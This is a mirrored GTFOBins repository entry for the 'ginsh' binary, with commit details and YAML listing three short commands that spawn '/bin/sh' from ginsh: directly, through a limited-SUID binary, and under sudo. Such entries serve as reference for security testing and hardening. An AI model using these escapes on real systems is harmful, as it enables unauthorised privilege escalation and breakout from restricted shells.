1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/ginsh.md
Miguel R 71de637921
Add ginsh
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-02-19 13:36:27 +01:00

16 lines
194 B
Markdown

---
functions:
shell:
- code: |
ginsh
!/bin/sh
limited-suid:
- code: |
./ginsh
!/bin/sh
sudo:
- code: |
sudo ginsh
!/bin/sh
---